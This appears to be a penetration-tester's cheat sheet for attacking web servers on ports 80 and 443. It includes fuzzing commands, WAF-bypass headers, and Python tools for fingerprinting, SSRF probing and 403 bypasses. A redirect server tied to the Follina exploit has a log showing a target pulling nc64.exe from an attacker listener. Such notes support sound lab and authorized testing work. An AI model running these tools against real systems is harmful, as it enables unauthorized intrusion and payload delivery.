80, 443 - HTTP(S)

Brute force directories / files / vhosts

ffuf:

ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://10.10.10.10/FUZZ
ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://target.com -H "Host: FUZZ.target.com" -fs <default_vhost_size>
ffuf -c -w /usr/share/wordlists/dirb/big.txt -u http://target.com/FUZZ.php -b "PHPSESSID=qotlc86o7lnh9jm51atioq3fbc"

For vhost fuzzing, first send one request with a Host that cannot exist to learn the size of the default response, then filter it out with -fs <default_vhost_size> (or -fw / -fl); without the filter every candidate looks like a hit.

## WAF Bypass using HTTP Headers
ffuf -c -w /usr/share/wordlists/dirb/common.txt -u https://target.com/FUZZ -H "X-Originating-IP: 127.0.0.1" -H "X-Forwarded-For: 127.0.0.1" -H "X-Remote-IP: 127.0.0.1" -H "X-Remote-Addr: 127.0.0.1" -H "X-Client-IP: 127.0.0.1"

Each header needs its own -H; a single -H with the names joined by commas sends one header (X-Originating-IP) whose value is the rest of the string, which no WAF rule will look at.

## Find URL-parameters
ffuf -c -w /usr/share/wordlists/dirb/big.txt -u https://target.com/admin/?FUZZ= -b "PHPSESSID=ciku9juef85i9sj1eju4alj375" -fs 1678

1678 is the size of the response to a parameter name that does not exist (request the page once with a random parameter to get it); -fs hides every response of that size, so only parameters that actually change the page remain.

wfuzz:

wfuzz -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt https://domain.com/api/FUZZ

Initial checks

Server Version

Check whether there are known vulnerabilities for the server version in use. The response headers (Server, X-Powered-By, X-AspNet-Version, X-Generator) and the names of the session cookies (PHPSESSID, JSESSIONID, ASP.NET_SessionId) are often enough to identify the technology and/or version.

webanalyze -host https://google.com -crawl 2
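Added example (my own code, not from this page and not part of webanalyze): a small fingerprinter that pulls product/version strings out of the Server, X-Powered-By, X-AspNet-Version and X-Generator headers, maps well-known session-cookie names to their platform, and also reads HTML comments and the generator meta tag. The two sample responses are constructed, not captured from any real host.

```python
import re

# Constructed sample responses (not captured from any real host).
SAMPLE_LAMP = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.4.41 (Ubuntu)\r\n"
    "X-Powered-By: PHP/7.4.3\r\n"
    "Set-Cookie: PHPSESSID=abc123; path=/; HttpOnly\r\n"
    "Set-Cookie: wordpress_test_cookie=WP+Cookie+check; path=/\r\n"
    "Content-Type: text/html; charset=UTF-8\r\n"
    "\r\n"
    "<html><!-- built with WordPress 5.8 --><body></body></html>"
)
SAMPLE_IIS = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/10.0\r\n"
    "X-AspNet-Version: 4.0.30319\r\n"
    "X-Powered-By: ASP.NET\r\n"
    "Set-Cookie: ASP.NET_SessionId=xyz; path=/; HttpOnly\r\n"
    "\r\n"
    "<html></html>"
)

# Session-cookie names that give away the server-side platform.
COOKIE_HINTS = {
    "PHPSESSID": "PHP",
    "JSESSIONID": "Java servlet container",
    "ASP.NET_SessionId": "ASP.NET",
    "CFID": "ColdFusion",
    "laravel_session": "Laravel",
    "csrftoken": "Django",
    "wordpress_test_cookie": "WordPress",
}
# Headers whose value normally looks like "<product>/<version>".
VERSION_HEADERS = ("server", "x-powered-by", "x-generator")

_PRODUCT_RE = re.compile(r"([A-Za-z][\w.-]*)[/ ](\d+(?:\.\d+)*)")
_COMMENT_RE = re.compile(r"<!--(.*?)-->", re.S)
_GENERATOR_RE = re.compile(
    r"""<meta[^>]+name=["']generator["'][^>]+content=["']([^"']+)["']""", re.I)


def parse_response(raw):
    """Split a raw response into (status_line, [(name, value), ...], body).
    Headers stay a list because Set-Cookie may repeat."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers = []
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers.append((name.strip(), value.strip()))
    return lines[0], headers, body


def fingerprint(raw):
    """Return {"products": {name: version or None}, "platforms": [...]} from
    version headers, cookie names, HTML comments and the generator meta tag."""
    _, headers, body = parse_response(raw)
    products, platforms = {}, []

    def record(text):
        found = _PRODUCT_RE.findall(text)
        if not found:                       # e.g. "X-Powered-By: ASP.NET"
            products.setdefault(text.strip(), None)
        for product, version in found:
            products[product] = version

    for name, value in headers:
        lname = name.lower()
        if lname == "x-aspnet-version":     # bare version, no product name
            products["ASP.NET"] = value
        elif lname in VERSION_HEADERS:
            record(value)
        elif lname == "set-cookie":
            hint = COOKIE_HINTS.get(value.split("=", 1)[0].strip())
            if hint and hint not in platforms:
                platforms.append(hint)

    # Comments and the generator meta tag frequently name the CMS and version.
    for regex in (_COMMENT_RE, _GENERATOR_RE):
        for m in regex.finditer(body):
            for product, version in _PRODUCT_RE.findall(m.group(1)):
                products[product] = version
    return {"products": products, "platforms": platforms}


if __name__ == "__main__":
    for sample in (SAMPLE_LAMP, SAMPLE_IIS):
        print(fingerprint(sample))
```

Feed it the raw bytes of a real response (e.g. from curl -i decoded to text) and take the versions straight to searchsploit or the vendor advisories; the cookie hints matter when a hardened server strips the version headers but still sets a default-named session cookie.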

Default pages with interesting info

/robots.txt
/sitemap.xml
/crossdomain.xml
/clientaccesspolicy.xml
/.well-known/

Also check the HTML comments of the main and secondary pages.

CMS Scanners

If a CMS is used don't forget to run a scanner, maybe something juicy is found:

cmsmap [-f W] -F -d <URL>
wpscan --force --update -e --url <URL>
joomscan --ec -u <URL>

401 Unauthorized & 403 Forbidden - Bypass

Automatic fuzzing with byp4xx

40X bypasser in Go. Methods from #bugbountytips, headers, verb tampering, user agents and more.

502 Proxy Error - SSRF

If any page responds with 502 Proxy Error, it is probably a misconfigured proxy. Send a request whose request line carries a full URL instead of a path, e.g. GET https://google.com HTTP/1.1 (plus the Host header and the other usual headers); if the proxy fetches google.com on your behalf, you have found an SSRF.
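Added example (my own code, not from this page): building the proxy-style request described above over a raw socket and telling a real proxied answer apart from the proxy's own 502 page. The proxy host/port, the google.com target and the "Proxy Error" marker are assumptions; the sample responses are constructed.

```python
import socket
import ssl
from urllib.parse import urlsplit


def absolute_uri_request(url, host=None, extra_headers=None):
    """Build a forward-proxy style request: the request target is the full
    URL rather than a path. Host defaults to the URL's own host, which is
    what a browser sends when it talks through a proxy."""
    parts = urlsplit(url)
    lines = [
        f"GET {url} HTTP/1.1",
        f"Host: {host or parts.netloc}",
        "User-Agent: Mozilla/5.0",
        "Accept: */*",
        "Connection: close",
    ]
    lines += [f"{k}: {v}" for k, v in (extra_headers or {}).items()]
    return ("\r\n".join(lines) + "\r\n\r\n").encode()


def parse_status(raw):
    """Numeric status code of a raw HTTP response, or None if it is not HTTP."""
    first = raw.split(b"\r\n", 1)[0].split()
    if len(first) < 2 or not first[0].startswith(b"HTTP/"):
        return None
    return int(first[1])


def classify(raw, marker=b"Proxy Error"):
    """'ssrf' when the proxy fetched the URL for us (a 2xx/3xx that is not the
    proxy error page), 'proxy-error' for the original 502, 'other' otherwise."""
    status = parse_status(raw)
    if status == 502 or marker in raw:
        return "proxy-error"
    if status is not None and 200 <= status < 400:
        return "ssrf"
    return "other"


def probe(host, port, url="https://google.com/", tls=False):
    """Send the absolute-URI request to host:port and classify the answer.
    tls=True wraps the socket without certificate checks (test targets are
    often self-signed); the proxy's own 502 page comes back the same way."""
    sock = socket.create_connection((host, port), timeout=10)
    if tls:
        ctx = ssl.create_default_context()
        ctx.check_hostname = False
        ctx.verify_mode = ssl.CERT_NONE
        sock = ctx.wrap_socket(sock, server_hostname=host)
    raw = b""
    with sock:
        sock.sendall(absolute_uri_request(url))
        while True:
            chunk = sock.recv(4096)
            if not chunk:
                break
            raw += chunk
    return classify(raw), raw


# Constructed sample answers (not captured from any host) for both outcomes.
SAMPLE_502 = (b"HTTP/1.1 502 Proxy Error\r\nContent-Type: text/html\r\n\r\n"
              b"<title>502 Proxy Error</title>")
SAMPLE_PROXIED = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
                  b"<title>Google</title>")

if __name__ == "__main__":
    print(classify(SAMPLE_502), classify(SAMPLE_PROXIED))
    # Against a real proxy (assumed address): print(probe("10.10.10.10", 80))
```

Compare the answer with the 502 you got for the plain request: if the status changes and the body is google's, the proxy is relaying, and the next step is pointing the URL at internal hosts (127.0.0.1, the cloud metadata address) instead of google.com.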

Protocol version

If the server speaks HTTP/1.1, retry the request as HTTP/1.0 and also test whether HTTP/2 is supported; access-control rules are sometimes tied to a single protocol version.

Other bypass techniques

  • Get the IP or CNAME of the domain and try contacting it directly, skipping the front end that enforces the restriction.

  • Change the protocol: from http to https, or from https to http.

  • Go to https://archive.org/web/ and check whether that file was publicly accessible in the past.
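Added example (my own code, neither byp4xx nor anything from this page): a minimal 40X bypasser that tries the tricks listed above one change at a time, i.e. path spellings, verb tampering and X-HTTP-Method-Override, the internal-IP headers, X-Original-URL / X-Rewrite-URL, and an HTTP/1.0 request line, over a raw socket so the protocol version is under our control. The fake_acl function is a constructed stand-in for a target; the host name and the /admin path are assumptions.

```python
import socket
import ssl

# Headers that some apps trust as "the client's real IP".
IP_HEADERS = ["X-Forwarded-For", "X-Originating-IP", "X-Remote-IP",
              "X-Remote-Addr", "X-Client-IP", "X-Real-IP"]
VERBS = ["POST", "HEAD", "OPTIONS", "PUT", "PATCH", "TRACE"]


def path_variants(path):
    """Spellings of the same path that a front-end ACL may normalise
    differently from the application behind it."""
    p = path.rstrip("/") or "/"
    return [p, p + "/", p + "/.", "/" + p, p + "..;/", p + "%20",
            p + "?", p.upper(), "/%2e" + p]


def candidates(path):
    """Yield (method, path, extra_headers, http_version), changing exactly one
    thing per request so a hit tells you which trick worked."""
    for variant in path_variants(path):
        yield "GET", variant, {}, "1.1"
    for verb in VERBS:
        yield verb, path, {}, "1.1"
    for verb in ("PUT", "DELETE", "PATCH"):
        yield "POST", path, {"X-HTTP-Method-Override": verb}, "1.1"
    for header in IP_HEADERS:
        yield "GET", path, {header: "127.0.0.1"}, "1.1"
    for header in ("X-Original-URL", "X-Rewrite-URL"):
        yield "GET", "/", {header: path}, "1.1"   # ask for /, rewrite to path
    yield "GET", path, {}, "1.0"                  # older protocol version


def raw_request(host, port, method, path, headers, version, tls=False):
    """Send one request on a raw socket (so the HTTP version line is under our
    control) and return the numeric status code."""
    lines = [f"{method} {path} HTTP/{version}", f"Host: {host}",
             "User-Agent: Mozilla/5.0", "Connection: close"]
    lines += [f"{k}: {v}" for k, v in headers.items()]
    sock = socket.create_connection((host, port), timeout=10)
    if tls:
        ctx = ssl.create_default_context()
        ctx.check_hostname = False          # test targets are often self-signed
        ctx.verify_mode = ssl.CERT_NONE
        sock = ctx.wrap_socket(sock, server_hostname=host)
    with sock:
        sock.sendall(("\r\n".join(lines) + "\r\n\r\n").encode())
        status_line = b""
        while not status_line.endswith(b"\r\n"):
            chunk = sock.recv(1)
            if not chunk:
                break
            status_line += chunk
    return int(status_line.split()[1])


def find_bypasses(path, send, blocked=(401, 403)):
    """Run every candidate through send(method, path, headers, version) and
    keep those whose status is no longer 401/403."""
    hits = []
    for method, p, hdrs, ver in candidates(path):
        status = send(method, p, hdrs, ver)
        if status not in blocked:
            hits.append((method, p, hdrs, ver, status))
    return hits


def fake_acl(method, path, headers, version):
    """Constructed stand-in for a target: a front-end rule that blocks GET/POST
    for "/admin" (case-insensitive, trailing slash ignored) over HTTP/1.1
    unless X-Forwarded-For claims to be localhost."""
    blocked = (path.lower().rstrip("/") == "/admin"
               and method in ("GET", "POST")
               and version == "1.1"
               and headers.get("X-Forwarded-For") != "127.0.0.1")
    return 403 if blocked else 200


if __name__ == "__main__":
    for hit in find_bypasses("/admin", fake_acl):
        print(hit)
    # Against a real host (assumed name and port):
    # send = lambda m, p, h, v: raw_request("target.com", 443, m, p, h, v, tls=True)
    # print(find_bypasses("/admin", send))
```

A status change is only a lead: a 200 on HEAD or OPTIONS may be an empty answer, and a 200 on "//admin" may be the app's own 404 page, so diff the bodies of the hits against the blocked response before calling it a bypass.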

Python3 HTTP Redirect

A small script that redirects every HTTP request to a given URL; useful for bypassing certain checks on 301 redirects or when using MSDT Follina.

#!/usr/bin/env python3
# Minimal redirect server: every request is answered with a 301 pointing at
# the URL given on the command line (the requested path is not appended).

import sys
from http.server import HTTPServer, BaseHTTPRequestHandler

if len(sys.argv) - 1 != 2:
    print("""
Usage: {} <port_number> <url>
    """.format(sys.argv[0]))
    sys.exit(1)

PORT = int(sys.argv[1])
TARGET = sys.argv[2]


class Redirect(BaseHTTPRequestHandler):
    def do_GET(self):
        # 301 (permanent) matches the log lines below; use 302 for a
        # temporary redirect if the client treats the two differently.
        self.send_response(301)
        self.send_header('Location', TARGET)
        self.end_headers()

    # Some clients probe with HEAD first; redirect those as well.
    do_HEAD = do_GET


HTTPServer(("", PORT), Redirect).serve_forever()

Example run (port 80 needs root; requests for any path land on the listener):

$ python3 redirect.py 80 http://10.10.14.2:8888
10.10.11.175 - - [19/Aug/2022 12:18:18] "GET / HTTP/1.1" 301 -
10.10.11.175 - - [19/Aug/2022 12:18:20] "GET /nc64.exe HTTP/1.1" 301 -
